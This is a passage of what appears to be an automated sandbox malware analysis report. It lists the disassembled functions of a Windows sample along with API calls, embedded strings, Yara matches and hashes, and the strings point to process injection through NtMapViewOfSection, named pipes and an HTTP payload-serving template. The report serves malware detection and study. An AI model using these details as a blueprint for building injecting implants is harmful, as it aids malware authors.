                                              • Part of subcall function 007BD044: malloc.LIBCMT ref: 007BD057
                                              • Part of subcall function 007BD074: htonl.WS2_32 ref: 007BD07F
                                            • fclose.LIBCMT ref: 007C1845
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                                            • String ID:
                                            • API String ID: 3587854850-0
                                            • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                            • Instruction ID: 23462840a2f624fd2d7165add7eb55d5cca708d83b870643b6ef102d59336e70
                                            • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                            • Instruction Fuzzy Hash: BE41A422714690C2DB54EB22E459B6E6351F7C9BD0F84823AEE5E47B96EF3CC506C740
                                            Function 007C5C60 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetACP.KERNEL32 ref: 007C5C78
                                            • GetOEMCP.KERNEL32 ref: 007C5C82
                                            • GetCurrentProcessId.KERNEL32 ref: 007C5CA8
                                            • GetTickCount.KERNEL32 ref: 007C5CB0
                                              • Part of subcall function 007D044C: _getptd.LIBCMT ref: 007D0454
                                            • GetCurrentProcess.KERNEL32 ref: 007C5CEC
                                              • Part of subcall function 007C0C64: GetModuleHandleA.KERNEL32 ref: 007C0C79
                                              • Part of subcall function 007C0C64: GetProcAddress.KERNEL32 ref: 007C0C89
                                            • GetCurrentProcessId.KERNEL32 ref: 007C5D5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                                            • String ID:
                                            • API String ID: 3426420785-0
                                            • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                            • Instruction ID: 9c285f900ef5b7203c80a4bed89d9839bc8d970a482edaf4f803f7966ab1e898
                                            • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                            • Instruction Fuzzy Hash: D541C322710A14D5EF10EBB1DC89BDD23A5BB88794F404429EE4987B66EF3CC50AC750
                                            Function 007C6F2C Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007C6F5E
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • htonl.WS2_32 ref: 007C6F91
                                            • recvfrom.WS2_32 ref: 007C6FD5
                                            • WSAGetLastError.WS2_32 ref: 007C6FE2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                                            • String ID:
                                            • API String ID: 2310505145-0
                                            • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                            • Instruction ID: 265678bb80eac8b37e9cdb00526e328ac806e0615a9f2370d3384c3ff6da1e03
                                            • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                            • Instruction Fuzzy Hash: 6E418172619A81C6EB148F25E844B2A7765F788BA8F14422DEA9D47B68DF7CD4C1CB00
                                            Function 007C79C4 Relevance: 9.1, APIs: 6, Instructions: 96threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                                            • String ID:
                                            • API String ID: 1014270282-0
                                            • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                            • Instruction ID: 9c31bb4b8359d3a4a117ed301001859023d77418ef7dc520611c7150d27b3866
                                            • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                            • Instruction Fuzzy Hash: F3317B32618B8486EB248F52D80879D77A5F788BD8F08852CEE4D47B55DF7CC605CB00
                                            Function 0077FA20 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                            • String ID:
                                            • API String ID: 1547050394-0
                                            • Opcode ID: d456e60cd18e585d7b0932005af9489af9dd9e8d049e32befec81c7ac9aec1ea
                                            • Instruction ID: e81a125fe16178f6771da24200ed63f79ca3ee53e2efbb97e6759774b2df8238
                                            • Opcode Fuzzy Hash: d456e60cd18e585d7b0932005af9489af9dd9e8d049e32befec81c7ac9aec1ea
                                            • Instruction Fuzzy Hash: 8311D061318786D1EF11AB32AA0632EA695BB49BC0F89D431EF8DD7B15EB3CD4418B10
                                            Function 007D0620 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                            • String ID:
                                            • API String ID: 1547050394-0
                                            • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                            • Instruction ID: 97a368afd2c4a036e7aa32595ecfbdcfa6d850adf94adfc8229b8cf7aa920905
                                            • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                            • Instruction Fuzzy Hash: 44113461304782C2EB11AF32B80532EA2B1BB84BC0F585423EE8A97B05DF7CC4618B90
                                            Function 00789B3C Relevance: 9.1, APIs: 6, Instructions: 63COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                                            • String ID:
                                            • API String ID: 2102446242-0
                                            • Opcode ID: 2ede11a5ffacbd3a0c7ce17d7f552b13c6d3b5dbdab4f68e6337480dbd1f78a2
                                            • Instruction ID: cd09f9df51070100e5470b591be3c16f810f16e7028d255df1ed6f3416d360ff
                                            • Opcode Fuzzy Hash: 2ede11a5ffacbd3a0c7ce17d7f552b13c6d3b5dbdab4f68e6337480dbd1f78a2
                                            • Instruction Fuzzy Hash: 1F110471B84685C5DB057FA9BCD933D6E54EB817A0F9E4128EB1A0B392DB7CC842C314
                                            Function 007BFC64 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007BFC85
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • free.LIBCMT ref: 007BFCC0
                                            • fwrite.LIBCMT ref: 007BFD01
                                            • fclose.LIBCMT ref: 007BFD09
                                            • free.LIBCMT ref: 007BFD16
                                              • Part of subcall function 007CF244: HeapFree.KERNEL32 ref: 007CF25A
                                              • Part of subcall function 007CF244: _errno.LIBCMT ref: 007CF264
                                              • Part of subcall function 007CF244: GetLastError.KERNEL32 ref: 007CF26C
                                            • GetLastError.KERNEL32 ref: 007BFD1B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                                            • String ID:
                                            • API String ID: 1616846154-0
                                            • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                            • Instruction ID: 62f6ccb2aeab6a5a1635503f12ef9f8a3eadc335583bb704d4a454ace0603f62
                                            • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                            • Instruction Fuzzy Hash: 5A11E711704784C2DE10FB22E8597AE9751BB89FE4F444239EF6E4BB8ADE3CC5058780
                                            Function 007C4488 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                                            • String ID:
                                            • API String ID: 3798860377-0
                                            • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                            • Instruction ID: 5b75b0d536c3e6b0db47ac4a6f26b0494a607ecc9a788d516a5d25d4f6da0dfa
                                            • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                            • Instruction Fuzzy Hash: D411C132A08A9483F7109B25F528B2A7365F788BA4F50421CDA5E47A95CF7CC8568B01
                                            Function 0077E3EC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 0077E40F
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • malloc.LIBCMT ref: 0077E41D
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E718
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E71D
                                            • malloc.LIBCMT ref: 0077E43F
                                            • _snprintf.LIBCMT ref: 0077E45A
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                            • malloc.LIBCMT ref: 0077E475
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                            • String ID: dpoolWait
                                            • API String ID: 2026495703-1875951006
                                            • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                            • Instruction ID: 6955157d0026284ef7f2d6b9af207b6dc3e1c60d14b531a864c42a502356275d
                                            • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                            • Instruction Fuzzy Hash: 41018071705B9085DE44DB12B8487196699F7ACFE0F159269EEAD877C5CE3CC4418780
                                            Function 007CEFEC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007CF00F
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • malloc.LIBCMT ref: 007CF01D
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF318
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF31D
                                            • malloc.LIBCMT ref: 007CF03F
                                            • _snprintf.LIBCMT ref: 007CF05A
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                            • malloc.LIBCMT ref: 007CF075
                                            Strings
                                            • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 007CF044
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                                            • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                                            • API String ID: 3518644649-2739389480
                                            • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                            • Instruction ID: 41be2f082249ffbe328b9eee01bb5c37ab7ff68add7c6937e876735446cc256d
                                            • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                            • Instruction Fuzzy Hash: 66018076705B9082DA44DB52B848B1D679AF78CFE0F15522DEEA9877C5CF7CC4418780
                                            Function 007725F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: freemallocstrchr$rand
                                            • String ID:
                                            • API String ID: 1305919620-0
                                            • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                            • Instruction ID: 53239cc0f1b111a33c46132aa22f2a539e5fe54af5aa26b264228e2970ebc0a4
                                            • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                            • Instruction Fuzzy Hash: 4F613862704FC481EE2A9B29A4153EAA390EF99BC8F089121DF9D17B56EF3DC147C740
                                            Function 007C31F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: freemallocstrchr$rand
                                            • String ID:
                                            • API String ID: 1305919620-0
                                            • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                            • Instruction ID: e1b4e4da7949e959da6c7e50062d112319f2f8147f30a593cd2ae27c37c0fd1a
                                            • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                            • Instruction Fuzzy Hash: D0612862608FC481EA269F29A4157EAA7A1FF95BC4F08812DDF8917B55EF3DC247C300
                                            Function 00763570 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007635BD
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • malloc.LIBCMT ref: 007635C8
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E718
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E71D
                                            • free.LIBCMT ref: 007636AF
                                            • free.LIBCMT ref: 007636B7
                                            • free.LIBCMT ref: 007636BF
                                            • free.LIBCMT ref: 007636CB
                                            • free.LIBCMT ref: 007636D8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_callnewhmalloc
                                            • String ID:
                                            • API String ID: 2761444284-0
                                            • Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                                            • Instruction ID: d8a4b2e8e5db2922ce260744b02ea9f41a7af5e6395cd5a6abf4bc3dcd5e9c36
                                            • Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                                            • Instruction Fuzzy Hash: FE41DD22704792ABDE19DF26D95436E6760FB5ABC0F444124DE5B8BB11EF3CDA22C701
                                            Function 007B4170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007B41BD
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • malloc.LIBCMT ref: 007B41C8
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF318
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF31D
                                            • free.LIBCMT ref: 007B42AF
                                            • free.LIBCMT ref: 007B42B7
                                            • free.LIBCMT ref: 007B42BF
                                            • free.LIBCMT ref: 007B42CB
                                            • free.LIBCMT ref: 007B42D8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                            • String ID:
                                            • API String ID: 996410232-0
                                            • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                            • Instruction ID: c37053070ae06a22f5a60281e37914e21874e9fb36ceaca493a60f80984555d1
                                            • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                            • Instruction Fuzzy Hash: FD41FF263007968BDF1AEB66A9547EE6761F749BC0F404128EF4647B16EF3CD826C700
                                            Function 007BF274 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: htonl$freemalloc
                                            • String ID: zyxwvutsrqponmlk
                                            • API String ID: 1249573706-3884694604
                                            • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                            • Instruction ID: 1b10ec65e46c10d0e9ad8fc2d921e16f176341096b3b78e3029c0fba67767cdf
                                            • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                            • Instruction Fuzzy Hash: CF21073630578086DB14EF76A99A76D6BD1A789FD0F04443DEE9A87B5BEE3CC5068300
                                            Function 007C3FA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32 ref: 007C3FE7
                                            • GetProcAddress.KERNEL32 ref: 007C3FF7
                                            • GetLastError.KERNEL32 ref: 007C40BF
                                              • Part of subcall function 007CCC00: GetCurrentProcess.KERNEL32 ref: 007CCC8D
                                              • Part of subcall function 007CD134: GetCurrentProcess.KERNEL32 ref: 007CD161
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                                            • String ID: NtMapViewOfSection$ntdll.dll
                                            • API String ID: 1006775078-3170647572
                                            • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                                            • Instruction ID: f5ccc05574a0afa6baafade050f12213cba1aeaef86f8dd41bd6efadaa7a7cb2
                                            • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                                            • Instruction Fuzzy Hash: 3331A132715B8486EB14DB62E459B6A67A0F788BB4F04032DEF6D07B96DF7CC4468B00
                                            Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: signal
                                            • String ID: CCG
                                            • API String ID: 1946981877-1584390748
                                            • Opcode ID: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                                            • Instruction ID: 293b1a304c256a7ee66eff26b1d91746a270e19344e3818b9830088d28418f87
                                            • Opcode Fuzzy Hash: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                                            • Instruction Fuzzy Hash: 1421A171B0154146EE396279865D33B10019B9A374F284E379A3DA73E0DAFECCC2830E
                                            Function 0077B630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok$_getptd_time64malloc
                                            • String ID: eThreadpoolTimer
                                            • API String ID: 1522986614-2707337283
                                            • Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                                            • Instruction ID: b5ec2998305ac8b46b0b949465dae9d23a4bafe4b1177f24c4fd39fc56dfa1ce
                                            • Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                                            • Instruction Fuzzy Hash: BB21B0B2A10B9485DF00DF52E08866D77A8F799FE4B1A8266EF5E83741CB38D441C780
                                            Function 007713B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007713D2
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • _snprintf.LIBCMT ref: 007713F1
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                            • remove.LIBCMT ref: 007713FD
                                            • remove.LIBCMT ref: 00771404
                                            Strings
                                            • uld not open process: %d (%u), xrefs: 007713D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                            • String ID: uld not open process: %d (%u)
                                            • API String ID: 2566950902-823969559
                                            • Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                                            • Instruction ID: ebd11ccf2111b1b57555c764fd1824e0c0e1334f98d11babb0ef5d817e93b36e
                                            • Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
